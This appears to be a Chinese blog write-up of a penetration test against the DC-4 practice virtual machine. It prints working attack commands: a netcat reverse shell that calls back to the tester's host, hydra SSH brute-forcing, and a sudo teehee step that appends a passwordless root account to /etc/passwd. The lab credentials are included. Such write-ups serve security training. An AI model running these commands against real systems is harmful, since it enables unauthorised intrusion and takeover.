DC4靶机渗透测试报告

概述

测试目的

测试范围

序号

系统

IP

1

本地

192.168.152.128

2

靶机DC4

192.168.152.134

详细测试流程

1、发现测试目标

2、信息收集

开放了22端口和80端口

访问80端口,发现没什么可用的,就用BP暴力破解

最后得到密码是happy

登录

3、漏洞利用

登录以后可以看到有执行命令的单选框,这个时候我们选择第一个列出当前目录的文件,然后在BP里面查看相应的数据包,可以看到在radio参数里面就是执行的命令,然后用加号替换空格

先将这个数据包发送到repeater可以按下ctrl+r

然后我们将radio参数里面的命令进行替换,换成

nc+192.168.152.128+1234+-e+/bin/sh

在发包之前先在kali上面执行nc –lvnp 1234

192.168.152.128是kali的ip地址,1234是开放监听的端口

获得一个shell

用python稳定化shell,获得交互式shell

我们先回到家目录发现有三个用户,以及在jim目录下面发现有一个密码字典

保存下来用户名和密码

用hydra暴力破解

hydra –L user.txt –P pass.txt 192.168.152.134 ssh

jim/jibril04

仔细看,在登录以后提示有新邮件

输入mail命令

进入到邮件对应的目录并打开邮件

得到了carles的密码^xHhA&hvim0y

carles/^xHhA&hvim0y

Linux里面mail邮件的用法https://blog.csdn.net/weixin_34765773/article/details/116642547

4、提权

在jim用户里面用sudo和suid提权都失败

但是在charles用户里面用sudo –l发现有个以root权限运行的命令

查看/etc/passwd文件,直接追加内容添加一个具有root权限的用户

添加了一个admin用户,密码为空

echo "admin::0:0:admin:/root:/bin/bash" | sudo teehee -a /etc/passwd

添加了一个无密码的具有root权限的用户admin

这里我尝试了在jim和charles里面用su命令切换到admin都失败了,后面还试过添加其他用户,发现用su命令都不可以切换

后面想着试一下用添加的用户直接登录靶机,发现直接就成功了,并且具有root权限

漏洞详情和修复建议

漏洞风险

High

漏洞描述

对登录没有次数限制,可以爆破密码

漏洞修复

限制登录次数,加强口令强度

测试结果综述

访问80端口,利用BP暴力破解账号密码,进入以后修改执行命令请求包,反弹shell,利用python获得交互shell。找到3个账号和一个密码字典,利用hydra破解得到jim的密码。

然后ssh连接jim发现有邮件,在邮件里面发现了charles的密码,连接上了以后分别在jim和charles上面尝试了sudo和suid提权,都失败。最后在charles发现有一个具有root权限的命令,利用这个命令,添加上具有root权限的用户admin.最后在靶机上直接登录成功。

posted @ 2024-07-17 11:01  CLLWA  阅读(32)  评论(0编辑  收藏  举报